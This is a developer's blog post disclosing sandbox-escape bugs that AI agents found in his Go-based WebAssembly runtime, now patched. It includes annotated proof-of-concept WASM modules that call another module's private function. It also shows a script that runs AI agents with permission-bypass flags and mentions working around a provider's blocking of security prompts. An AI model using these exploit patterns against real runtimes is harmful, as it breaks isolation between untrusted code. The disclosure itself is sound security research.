All the Bugs They Found

Security vulnerabilities found in Epsilon, a WebAssembly (WASM) runtime written in Go. AI agents discovered over 20 security flaws, including sandbox escapes that allowed malicious WASM modules to break isolation and access another module's private state. One specific vulnerability, "Zero Is Not Null," occurred because Epsilon incorrectly initialized unassigned function reference locals to zero instead of null, enabling attackers to call private functions by exploiting the runtime's representation of funcrefs as integer indices.

All the bugs they found Last year I wrote a small WASM runtime in Go, Epsilon https://github.com/ziggy42/epsilon . As far as runtimes go, this is a pretty simple one: no JIT, just a pure instruction interpreter in ~11k lines of code. It is also very extensively tested against the official WASM testsuite https://github.com/WebAssembly/testsuite . Epsilon is designed to be embeddable in other applications and provide a sandbox for potentially untrusted code. How many security vulnerabilities do you think AI agents found in it? More than 20. Most of these were somewhat simple DoS attacks, e.g. panics during parsing or validation. Some were clear API design failures that would probably have surfaced sooner with a bit more usage of the project. A few weren't exploitable on their own, but would become serious if combined with a future bug elsewhere. A handful, though, were properly interesting: sandbox escapes that let a malicious WASM module https://developer.mozilla.org/en-US/docs/WebAssembly/Guides/Concepts webassembly key concepts break out of its isolation and reach into another module's private state. These are my favorites. Background A single Epsilon runtime can host multiple WASM modules. In the WASM security model, modules are isolated except for explicitly exported and imported objects. Unexported functions, memories, etc., are private to the module that defined them. WASM is a typed stack machine, but the type checking does not happen at runtime: before execution, a validator walks the bytecode and verifies that at any point the values on the stack have the expected type. For example, a module that tried to local.set an i32 into a funcref local would be rejected before it ever started running. Epsilon then executes blindly, trusting the validator's earlier checks. Thanks to the type guarantees provided by the validator, a funcref at runtime in Epsilon is represented as an int32 : -1 is the null sentinel, and any non-negative value is an index into the global function store, shared across all modules instantiated in the runtime. As a result, the constant 0 and a funcref pointing to the first function in the store are indistinguishable during execution. This simplifies the implementation and improves performance, at the cost of delegating safety entirely to the validator. Each attacker module in the following sections runs alongside the same victim module: module func $secret result i32 ;; declares a function $secret: takes no parameters, ;; returns a 32-bit integer. Private, never exported i32.const 1337 ;; pushes 1337 onto the stack; becomes the return value Since $secret is the first function instantiated into the runtime, it lives at store index 0. The goal of each attacker module is to get the VM to call it, returning 1337 , despite never being given a legitimate funcref to it. 1. Zero Is Not Null The simplest of the three. Here's the attacker: module type $t func result i32 ;; the call indirect type signature table 1 funcref ;; a table of size 1 essentially an array of funcrefs . ;; Identified by its module-level index, which is 0 ;; here since it's the first and only table declared func export "exploit" result i32 local $f funcref ;; declared, never assigned; ;; per spec, ref locals default to null i32.const 0 ;; the slot in the table where we'll write ;; stack: 0 local.get $f ;; push $f's value null ;; stack: 0, null table.set 0 ;; immediate 0 picks which table to write to ;; tables 0 ; pops two values from the stack: ;; first the funcref null , then the slot index. ;; Writes tables 0 0 = null ;; stack: i32.const 0 ;; the slot in the table to fetch from next ;; stack: 0 call indirect type $t ;; pop the slot, fetch tables 0 slot null , ;; and call it The exploit function, while perfectly valid WASM, should trap at runtime. The local $f is uninitialized, therefore null. call indirect should fail. Except that in Epsilon, it didn't. It called $secret instead. The culprit was how locals were initialized. When a function is called, the spec requires locals to be initialized to their default values: zero for numeric and vector types, but null for reference types. Epsilon achieved this by zeroing all non-parameter locals using Go's clear : // Clear non-parameter locals to their zero values. clear locals numParams: This was idiomatic and fast, but Go's clear simply set the local to 0 . Per our funcref representation, that's not null -1 : it's the store index of $secret . When exploit was called, rather than trapping on a null call indirect , the VM called the function at store index 0. 2. Phantom Block Parameter This one combines two separate bugs: module type $t func result i32 table 1 funcref func export "exploit" result i32 local $f funcref ref.null func ;; push a null funcref onto the stack i32.const 0 block param i32 ;; block consumes the i32 from the stack... drop ;; ...and immediately drops it local.set $f ;; store top of stack into $f the null funcref local.get $f ref.is null ;; is $f null? if result i32 i32.const 42 ;; expected path: $f was null, return 42 else ;; unreachable path: $f is always null i32.const 0 local.get $f table.set 0 i32.const 0 call indirect type $t end In any correct WASM implementation and indeed in the latest version of Epsilon , exploit returns 42 , as expected. It returned 1337 instead. Stack Height Misalignment During their execution, control-flow blocks block , loop , if may consume inputs from the stack and produce results on it. At the end of execution the stack must look exactly as the block's signature describes: N params consumed, N results pushed in their place. Anything the body left in between has to be discarded, so the runtime needs to know how high the stack was when entering the block. In Epsilon, that height was recorded when a new control frame was pushed onto the control frame stack: vm.pushControlFrame frame, controlFrame{ stackHeight: vm.stack.size , // height at block entry // ... } But here lies the first bug: that line captures the stack height after the block's parameters are already pushed. In WASM, parameters are consumed by the block: they belong to the block, not to the surrounding scope. So the validator and the VM now disagree by exactly N parameters about where "the bottom of the block" is on the stack. Memory Resurrection When a block ends, the VM calls unwind to restore the stack to its declared, pre-block height. targetHeight is the stack height recorded in the controlFrame structure. func s valueStack unwind targetHeight, preserveCount uint32 { valuesToPreserve := s.data s.size -preserveCount: s.data = s.data :targetHeight s.data = append s.data, valuesToPreserve... } Because of the stack height misalignment bug above, targetHeight is too high: it counts the block's parameters as if they were still on the stack. Therefore s.data :targetHeight causes the slice to grow back rather than be truncated. As long as targetHeight <= cap s.data , Go is happy to re-expose whatever was sitting in the backing array. Parameters that the validator considered consumed are now resurrected on top of the stack. Bugs Collide Let's walk through the exploit function with both bugs in mind: func export "exploit" result i32 local $f funcref ref.null func ;; stack: null funcref i32.const 0 ;; 0 is the index where $secret happens to sit in the ;; global function store, since it was the very first ;; function instantiated ;; stack: null funcref, 0 block param i32 ;; bug 1: VM records stackHeight = 2; the validator, ;; treating the i32 as consumed per spec , records 1 drop ;; pops and discards the top of the stack the 0 ;; stack: null funcref ;; bug 2: end calls unwind, which sets s.data to ;; s.data :2 , so len 1 grows back to 2, and the 0 we ;; dropped resurrects on top. The top is now an int32 ;; of value 0, but the validator still thinks it's a ;; funcref ;; stack: null funcref, 0 local.set $f ;; 0 is put in $f, which should be a funcref. Since ;; Epsilon's internal representation of funcref is also ;; an int32, this works at runtime local.get $f ;; stack: null funcref, 0 ref.is null ;; null is -1, so 0 isn't null; pops the funcref and ;; pushes 0 false . The top of the stack visually ;; still looks like 0, but its type changed from ;; funcref to i32 ;; stack: null funcref, 0 i32 false if result i32 ;; pops the i32 condition 0, false , so the else ;; branch fires ;; stack: null funcref i32.const 42 ;; not taken else i32.const 0 ;; the slot index for the upcoming table.set ;; stack: null funcref, 0 local.get $f ;; the funcref value to store actually the int32 0 ;; stack: null funcref, 0, 0 table.set 0 ;; pops the funcref then the slot index; both are 0, ;; so tables 0 0 now holds the integer 0 dressed as ;; a funcref ;; stack: null funcref i32.const 0 ;; the slot index within the table to look up ;; stack: null funcref, 0 call indirect type $t ;; pops the slot index, fetches tables 0 0 our ;; int 0 dressed as a funcref , which points at ;; store 0 = $secret. Call it. end A perfectly valid WASM module just called an unexported function from another module. By choosing a different integer, it could reach any private function in Epsilon's global store. 3. Ghost in the Stack The first two exploits relied on the validator and VM disagreeing about values on the stack inside the sandbox. This one shifts category: the disagreement is between a host function's declared signature and what it actually returns at runtime. module type $t func result i32 import "env" "leak" func $leak result funcref ;; the host must provide env.leak table 1 funcref func export "exploit" result i32 i32.const 0 ;; table index i32.const 0 ;; index of $secret in the global function store call $leak ;; declared to return a funcref; the validator thinks ;; the stack gains one new value after this call table.set 0 ;; store the "result" actually our 0 into the table i32.const 0 call indirect type $t return For this exploit to land, the host needs to provide a function env.leak whose runtime behavior diverges from its signature: one that returns fewer results than promised. In a correct WASM implementation, the runtime should trap on that mismatch. In Epsilon, the VM blindly trusted the host's declared signature: res := fun.hostCode fun.module, args... vm.stack.pushAll res If leak returned an empty slice instead of the promised funcref, pushAll did nothing. The validator believed a funcref had been pushed. Instead, the stack was unchanged. The two 0 s pushed before $leak were still on the stack. The VM ran table.set 0 and popped them: one as the funcref, one as the slot index. tables 0 0 now held the integer 0. call indirect fetched it and happily called the function at index 0, $secret . Methodology I used a combination of approaches to find these bugs, starting with a script similar to the one described in the Black-hat LLMs https://youtu.be/1sd26pWhfmg?t=307 talk: Show the script bash /bin/bash Directory to store vulnerability reports VULN DIR="vulnerabilities" mkdir -p "$VULN DIR" List of areas to investigate AREAS= "epsilon/parser.go" "epsilon/validation.go" "epsilon/vm.go" "epsilon/memory.go" "epsilon/imports.go" "wasip1/wasi resources.go" "wasip1/wasi poll.go" "wasip1/wasi unix.go" PROMPT TEMPLATE="You are an expert security researcher and exploit developer. STRICT CONSTRAINT: Do NOT modify any file outside the '$VULN DIR/' directory. Do not touch 'epsilon/', 'wasip1/', or any other source file. All output goes in '$VULN DIR/' only. Your task is to objectively investigate the following file for security vulnerabilities: %s Explore the file and any related files, data structures, or interactions it depends on. Where relevant, check behavior against the WebAssembly 2.0 specification https://webassembly.github.io/spec/versions/core/WebAssembly-2.0.pdf and the WASI Preview 1 specification — a deviation from spec in security-sensitive code is itself a vulnerability. Do not flag missing features from specs beyond WebAssembly 2.0. Do not assume a vulnerability exists. If after thorough investigation you find nothing exploitable, state so clearly and stop. If you confirm a vulnerability: 1. Create a dedicated directory: '$VULN DIR/<vulnerability name /' 2. Write 'README.md' with: root cause, impact, and reproduction steps 3. Write a PoC exploit: a concrete, runnable demonstration Go test, .wasm file, or script that proves the vulnerability is triggerable by a malicious WebAssembly module without any special host configuration" Get agent from command line, default to claude AGENT=${1:-claude} if "$AGENT" == "claude" ; then AGENT CMD="claude --dangerously-skip-permissions" elif "$AGENT" == "gemini" ; then AGENT CMD="gemini --yolo" elif "$AGENT" == "vibe" ; then AGENT CMD="vibe --trust" else echo "Usage: $0 claude|gemini|vibe " exit 1 fi for AREA in "${AREAS @ }"; do echo "--------------------------------------------------" echo "Starting investigation of area: $AREA using $AGENT" echo "--------------------------------------------------" CURRENT PROMPT=$ printf "$PROMPT TEMPLATE" "$AREA" $AGENT CMD -p "$CURRENT PROMPT" echo "Finished investigation of $AREA." echo "Sleeping for 10 seconds to respect rate limits..." sleep 10 done Then I moved to a skill https://github.com/ziggy42/epsilon/blob/main/.agents/skills/security-audit/SKILL.md instead, which is slightly more convenient. I'm honestly not sure which one is better as I've used them at different times: by the time I switched, the script had already found the low-hanging fruit, so the skill never had a chance at those. Re-discovering the same bugs this way is left as an exercise to the reader. To work around token limits, I also used a variety of models, mainly: - Gemini 3 Flash - Gemini 3.1 Pro - Opus 4.7 Again, it's hard to compare their performance as they were used at different times. Most of the more serious problems were discovered by Gemini 3.1 Pro, which is the main model I used at the beginning. Trying to work around Anthropic blocking security-related prompts does get pretty tiring though. Closing thoughts Epsilon is a weekend hobby project, so I went in expecting agents to find something . It was still astonishing to see some of these issues. Bug 2 in particular is pretty cool. Please update to version 0.1.0 https://github.com/ziggy42/epsilon/blob/main/CHANGELOG.md 010---2026-05-19 .